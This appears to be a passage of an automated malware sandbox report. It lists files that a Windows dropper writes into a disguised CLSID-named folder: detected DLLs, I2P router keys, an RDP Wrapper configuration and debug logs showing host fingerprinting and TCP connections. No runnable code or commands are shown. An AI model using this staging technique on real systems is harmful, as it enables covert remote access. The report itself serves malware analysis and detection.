Preview:	..X.......j.zPU.kC......HvU3.ib j.I:4..T$..?....]h.B....F.IL..m.1p2K.....4o.ry...\|.........0Z}.g.....!nH.=K_..~._o...3vvj,0G..$..m...3\jg.l...74.8...pZ6^.....@..p.)fCB.W.V....u....Z.. ..u.0!....pH@..^$2\...(.......a.R...~4.R..k..d..a..O.,B.4...z.._>.r"....=..H>.6@.`:"...^A.t....g...Z....Q.mN.O;.'.&!&.R.sR..{.5.S....R........=.^.(..j.~..4.w.]...A.d.t...,X.....g$1{{*/...'t.....!..~0.),. ....R3.Cd.7......V..........Z.S..)w.y.kEX......y.'..)N.....Cl...6....P......G.... <=..$..E..8N

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	5.84692809488736
Encrypted:	false
SSDEEP:	3:J+uuHNto9HXKEDsecLN:wBtm93zsx
MD5:	714EF232860E57ED99E1E8CB8A0318A4
SHA1:	16942B55223C0D76B439BF80DE69CF01F2F5DFED
SHA-256:	63B02E858C4FAA5AA348A15BABC90DA211AB251FB305739E7337BDAC43B7E5B0
SHA-512:	5AE602529BADFEB3DCC994D086CE8EE0C3681AA0CCB2C2DCAFFD4E9804177BAD89B4E7645647075F293620150A2C413B8B5BA1F9007D2028F56308544E0AB5AC
Malicious:	false
Preview:	.........'_..a...Z..<.;? ...tqh_.$.h..Q.-...mk&...$..y..Q.c\....O2.&r.w.y..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	721
Entropy (8bit):	6.562107366925408
Encrypted:	false
SSDEEP:	12:9DRoYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgv0Oys01ro8J7:JRfrPrPrPrPrPrPrPrPrPrvLQ5aqHXKQ
MD5:	0B1FCB5DE4677EF1FB109C4A5C422452
SHA1:	EFB917C1F241499F92D2157CCE191955D4BEFF18
SHA-256:	9263B2B560E838198CC3423EACB1916699B609B4E8D88AC1B0BBD1C4EB6C43E0
SHA-512:	CA85568C9206803759D2501BD590F0487B7B8B00268BFA3725F85E5EF806191A07C2484652F9003259C83A7B5FACC81BA46A3EB85FEF3E10907565AFF6D5103A
Malicious:	false
Preview:	...e..,.*.!(....z.h.=..7{Y...:l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._hl....7...e.sr...x...5u\|...kW...........\|LP............NTCP2.@.caps=.4;.s=,u9oM7dcPiNoTJ1-D~WHc0d2FWoOVPKk7PyCvxogJdHE=;.v=.2;..........SSU2.q.caps=.4;.i=,qcu6pvksYwKe0An4BK8kTsWbuIBgQYt1alJN0T4QqN8=;.s=,18h9sQIfONo6BXQ0wdNJ-i86-camylCsqKKABASImCg=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;IT.........i.Np.O....,\|.q.d&.t..!t..i_.D.2...s.ru..S...3~..:.$.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	455
Entropy (8bit):	6.038835783469648
Encrypted:	false
SSDEEP:	12:9DRoYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgv0N8o3:JRfrPrPrPrPrPrPrPrPrPrv48o3
MD5:	AE133D521904C0EF0F151D96793317FB
SHA1:	802A1D85C8ED221417A8FD8D31DC9D8E76B02E14
SHA-256:	BC2B5862F5B23264EC82D50893C139FC392920B769E38BFEEBA8374C7604A765
SHA-512:	B4A6B8A3230B02B03EF8CC7F27DE48717D5EE5D49626E8B6FA0B7BCE84DE14E0C3B07295CAEECE934A73F6B7DCF814246D56C5F318521C27C28872F99C6876D4
Malicious:	false
Preview:	...e..,.*.!(....z.h.=..7{Y...:l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._hl....7...e.sr...x...5u\|...kW...............O.....9.....0.......A%#wgH.X.../.>.H.FAX.o.a.N.t..Y\

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	96
Entropy (8bit):	6.306265755906958
Encrypted:	false
SSDEEP:	3:nUyZ21aDJf4OnROeEuDkM2iXu8pr6n:nU4SOIeO8pr6
MD5:	E8DAC512D88C81A631B8F1AB4293F2F4
SHA1:	B0B4B716E155FD191E1708CC30189DE34ED5E8BC
SHA-256:	0B947CDDF832857F129EB6585E020828CBB931F3CB479EAC88A803E46344FD45
SHA-512:	EE98333D3BAF1FD3A328E56E8DCAEC8AA35C37F97124A0B778AE5CDF647D791BA80161F7AE39B56C844FE40E6F93F15F92AE94ADF3BBCAB8C188B28BCF658839
Malicious:	false
Preview:	..}...8.:.t4..I./:...P........(.?#Hw5'.~K............M!.r.ja.d....,c.......$N...`A.ujRM.>...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	6.229509810228039
Encrypted:	false
SSDEEP:	1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
MD5:	4E320E2F46342D6D4657D2ADBF1F22D0
SHA1:	A5ACFE6397DFFC61D243206885C389EA05428755
SHA-256:	7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
SHA-512:	E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4672
Entropy (8bit):	5.34667923568992
Encrypted:	false
SSDEEP:	96:idHwWYJ9VvyHzHH0Hf0HaSH8mHu5SHSgdQpmHSm5SHTmHOn5SHHSHBMKmHX5SH8l:AziTqTn0/06SHO5SiAz5SKc5SnSA35SG
MD5:	EC7754208DC38D9E9B7EC03FACE04697
SHA1:	5E9614D8872F22CF32AE2F1F9EC99192B6F18476
SHA-256:	A88C3D9FD4BFD447453D3966C26ABE3DB520B7140EC62AABE35D7D44572637D1
SHA-512:	704D3517DB7EC1A468C553B5DC0000EACC3156F23722C39CE45EB6EFCF3E2C93DF5FBDFD345DD77B6439AF724EED160303F6395F1E56BC703C58586679C1422B
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.2884725801282775
Encrypted:	false
SSDEEP:	1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:	91A0DD29773FBFB7112C5FCFF1873C13
SHA1:	E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:	AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:	F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1167
Entropy (8bit):	5.503364029510054
Encrypted:	false
SSDEEP:	24:CFAGHr5lGyclY7Gfy6BgT7cRE9FLxJ7J10ERq4XYwHeAOp:CFdHr54yclDYcm9FLnvOyneD
MD5:	75E9CBA42A12E9E69A9E76898E201A20
SHA1:	D181F0716A3C415CD2BFEF3FD7D77D765787BC67
SHA-256:	2505BDA1C8A6B657B169A199C1C1078E24147F10E2D509D9D7CC92AD92440E3F
SHA-512:	5AA21B37B35AC20031872435021D8B55EE55796A7F1ED351B1B1555ABBE3533BE11AAC4B53CE6FAC29947C2482FC88FBCC39A71707B213B21B9FDB234F0CE5AF
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11ec9d36)..[I] (tcp_connect) -> Done(sock=0x39c,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.313152038164236
Encrypted:	false
SSDEEP:	3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:	C89542ABA45CE1084760AE8DE6EAE09E
SHA1:	603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:	1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:	60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	5.501517921965703
Encrypted:	false
SSDEEP:	24:CFAGH75lGyclY7Gfy6BgT7cRE9FLxJ7J10dk1RDocXYWYcRAENmMeAOp:CFdH754yclDYcm9FLnv/icLMMeD
MD5:	499A04EBE3C94D77D89E75C6CD5BF99E
SHA1:	8F3D9D15387DF4B793E65D0BDEDEF7C83579C798
SHA-256:	482EA17618A25BC59BB0E0B28D73AD90C61E0F5F28B1BEC711D809917B3ADB9A
SHA-512:	0D743E3884A56FBEA42F8B9C55B3917ADD3E83ECD7B28748C1823F101102C877B95C780E7F6363C7F73368C9C39849BDA61E72EA1E2327EE6ED64ED92D8FBA7A
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11bd

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.277217301921545
Encrypted:	false
SSDEEP:	1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:	D0F0423AEEE6B6FF6754D860603D46D0
SHA1:	A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:	81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:	C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1926
Entropy (8bit):	5.480111417919406
Encrypted:	false
SSDEEP:	48:CFdHr+54yclDYcm9FLnvHf5ZR5+sR5HR5ikfP5OKXbeD:idHxNYJ9Vv8D
MD5:	4C26C88B30F253D89B0839E67F813835
SHA1:	7B689FF45EEB685F796F36748288CB1639D63496
SHA-256:	C902DFA1B8835B80123D458DA99171AFC2F3345B0007454F6AF7D8895F0AB733
SHA-512:	4DA9B59AA336A742AEDCFEC64385476A9A6D025F16D773AFC3F2DDA83EBBA21152AF0901271A55347667DA501677DBBE16D55431C02EE6AAE2120F4034AEDF1B
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1177e1cc)..[I] (tcp_connect) -

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2290767543196575
Encrypted:	false
SSDEEP:	1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:	4C086C8F48C4D0F8C20410E60340AEC9
SHA1:	77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:	0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:	CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	441513
Entropy (8bit):	5.449545529389614
Encrypted:	false
SSDEEP:	768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:	5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:	E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:	060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:	B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg

Download File

Process:	C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
File Type:	data
Category:	dropped
Size (bytes):	10451376
Entropy (8bit):	6.708065758846917
Encrypted:	false
SSDEEP:	196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
MD5:	312704A6232D74733DE04C6E00F8CF21
SHA1:	2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
SHA-256:	8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
SHA-512:	5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
Malicious:	false
Preview:	_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	10639360
Entropy (8bit):	7.4147455331909855
Encrypted:	false
SSDEEP:	196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
MD5:	7D1755E8E41A6C2F08D2FAEFFDF9DAD1
SHA1:	C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
SHA-256:	44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
SHA-512:	B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
